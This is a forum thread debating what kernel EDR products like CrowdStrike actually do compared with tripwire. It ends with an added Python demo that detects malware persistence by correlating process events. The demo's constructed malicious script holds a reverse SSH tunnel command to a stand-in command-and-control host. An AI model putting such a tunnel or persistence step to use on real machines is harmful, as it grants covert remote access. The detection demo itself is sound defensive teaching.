
158 points kenjackson | 2 comments
ykonstant No.41031312
Sorry to hijack this post, but for affected admins reading this: how is the recovery process going? What is your estimated time to normalcy?

Also, for Linux and especially BSD admins: has this incident affected your perspective on EDR/XDR systems in the kernel? What would you suggest as an alternative to ensure regulatory compliance?

replies(2): >>41031360 #>>41041546 #
tgv No.41031360
I do manage a few Linux machines (firewall passes only http and https -> nginx -> custom backend), but I'd never heard of Crowdstrike before. I don't even know what their product is supposed to do. As far as I can see, kernel-level protection could only help prevent someone bypassing the firewall and triggering an exploit in nginx. But if Crowdstrike knows about such exploits, everyone does, and the firewall or nginx gets patched.

What am I missing?

Edit: I know it is supposed to implement "EDR", but it's always explained in the vaguest of terms.

replies(5): >>41031414 #>>41031431 #>>41031453 #>>41033240 #>>41034207 #
jabroni_salad No.41031453
> But if Crowdstrike knows about such exploits, everyone does

This is actually the most important thing happening with EDR as a concept: it handles novel cases that have never been seen before, with a human review very quickly. Our CSIRT has an SLA of 3 minutes.

It's right there in the name acronym. Detection and Response.

replies(2): >>41031905 #>>41034825 #
therein No.41031905
So like let's say a user of a computer in my fleet ran something infected with malware that had enough diligence to have a unique file signature. It puts itself into startup items in a creative way and then calls back home with just a standard SSH connection.

In that case are you telling me their pitch is that they detect this behavior, dispatch some human agent from their CSIRT within 3 minutes to remotely but manually come check the binary, dump some strings, do some reverse engineering and track the CC server etc?

replies(3): >>41032312 #>>41032982 #>>41036029 #
p_l No.41032982
Not necessarily from Crowdstrike CSIRT, but I have experience of security calling me back within 30 minutes of my changing a security-impacting system file, to verify that it was done by me and not something else.

Probably because they had already looked at the modification, which was benign, so a slower escalation path in the absence of other indicators.

replies(1): >>41034864 #
rswail No.41034864
tripwire(1) has been part of systems for decades.

Bullshit about "they had already looked at the modification which was benign".

So your "security" is to totally expose every operation of your software to an external party with absolutely no auditing of what data they are exfiltrating from your system?

replies(1): >>41035397 #
p_l No.41035397
It was handled by internal security team.

Also, tripwire was limited to periodically scanning files; it couldn't, for example, observe syscalls and trace relationships between them.

But yes, tripwire is a very early EDR/XDR.
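The two detection styles the last few comments contrast, as an added example that is not code from CrowdStrike, tripwire, or any commenter in this thread: a tripwire-style hash baseline over watched files next to the kind of process/file/network correlation an EDR sensor does. It replays the scenario from therein's comment (a user runs an infected binary with a unique hash, it persists itself into a startup location, and the persisted script later beacons out over a plain `ssh` client). The event format, the `PERSIST_DIRS` list, the pids, paths, addresses and file contents are all constructed for the demo.

```python
"""Added example: file-integrity diffing in the tripwire style beside
EDR-style event correlation. Everything below (events, paths, hosts,
file contents) is constructed; it is not any product's real telemetry."""
import hashlib

# ---- Tripwire-style file integrity monitoring --------------------------
def hash_snapshot(files):
    """files: {path: bytes}. Returns {path: sha256 hex digest}."""
    return {p: hashlib.sha256(b).hexdigest() for p, b in files.items()}

def fim_diff(baseline, current):
    """Compare two snapshots; returns (added, removed, modified) path sets."""
    added = set(current) - set(baseline)
    removed = set(baseline) - set(current)
    modified = {p for p in baseline.keys() & current.keys()
                if baseline[p] != current[p]}
    return added, removed, modified

# ---- EDR-style behavioural correlation --------------------------------
# Persistence locations to watch (assumed list for the demo).
PERSIST_DIRS = ("/etc/cron.d/", "/etc/systemd/system/",
                "/home/alice/.config/autostart/")

def edr_correlate(events):
    """Flag a chain: a process drops a file into a persistence location,
    that file is later executed, and the resulting process (or a child of
    it, e.g. /usr/bin/ssh) opens an outbound connection. No single step is
    suspicious on its own; the lineage across the steps is the signal."""
    ppid = {}      # pid -> parent pid
    image = {}     # pid -> executable path
    dropped = {}   # persisted path -> pid that wrote it
    launched = {}  # pid -> persisted path it was executed from
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "process_start":
            ppid[ev["pid"]] = ev["ppid"]
            image[ev["pid"]] = ev["image"]
            if ev["image"] in dropped:
                launched[ev["pid"]] = ev["image"]
        elif kind == "file_write":
            if ev["path"].startswith(PERSIST_DIRS):
                dropped[ev["path"]] = ev["pid"]
        elif kind == "net_connect":
            # Walk up the process tree looking for an ancestor that was
            # launched from a file dropped into a persistence location.
            pid = ev["pid"]
            while pid in ppid:
                if pid in launched:
                    alerts.append({
                        "dropper_pid": dropped[launched[pid]],
                        "persisted": launched[pid],
                        "beacon_pid": ev["pid"],
                        "beacon_image": image.get(ev["pid"]),
                        "dst": ev["dst"],
                    })
                    break
                pid = ppid[pid]
    return alerts

# ---- Constructed scenario from the thread -------------------------------
EVENTS = [
    {"type": "process_start", "pid": 100, "ppid": 1, "image": "/usr/bin/bash"},
    # user runs the infected download (unique hash, no signature anywhere)
    {"type": "process_start", "pid": 101, "ppid": 100,
     "image": "/home/alice/Downloads/invoice_viewer"},
    {"type": "file_write", "pid": 101,
     "path": "/home/alice/.config/autostart/updater.sh"},
    # the user's own ssh session: same binary, same port, must not alert
    {"type": "process_start", "pid": 102, "ppid": 100, "image": "/usr/bin/ssh"},
    {"type": "net_connect", "pid": 102, "dst": "192.0.2.10:22"},
    # next login: the persisted script runs and beacons over plain ssh
    {"type": "process_start", "pid": 200, "ppid": 1,
     "image": "/home/alice/.config/autostart/updater.sh"},
    {"type": "process_start", "pid": 201, "ppid": 200, "image": "/usr/bin/ssh"},
    {"type": "net_connect", "pid": 201, "dst": "203.0.113.7:22"},
]

BASELINE_FILES = {"/etc/ssh/sshd_config": b"PermitRootLogin no\n"}
CURRENT_FILES = {**BASELINE_FILES,
                 "/home/alice/.config/autostart/updater.sh":
                 b"#!/bin/sh\nssh -N -R 2222:localhost:22 c2@203.0.113.7\n"}

def run_demo():
    """Returns ((added, removed, modified), edr_alerts) for the scenario."""
    fim = fim_diff(hash_snapshot(BASELINE_FILES), hash_snapshot(CURRENT_FILES))
    return fim, edr_correlate(EVENTS)

if __name__ == "__main__":
    (added, removed, modified), alerts = run_demo()
    print("FIM sees new file(s) at next scan:", sorted(added))
    for a in alerts:
        print("EDR alert:", a)
```

The file-integrity pass only learns, at its next scan, that a file appeared under autostart; it cannot say which process wrote it or what happened afterwards. The correlation pass attributes the write to pid 101, recognises that the same path was later executed, and ties the outbound `ssh` from its child back to that chain, while the user's own `ssh` to port 22 (same binary, same port) stays silent because nothing in its lineage was launched from a dropped file.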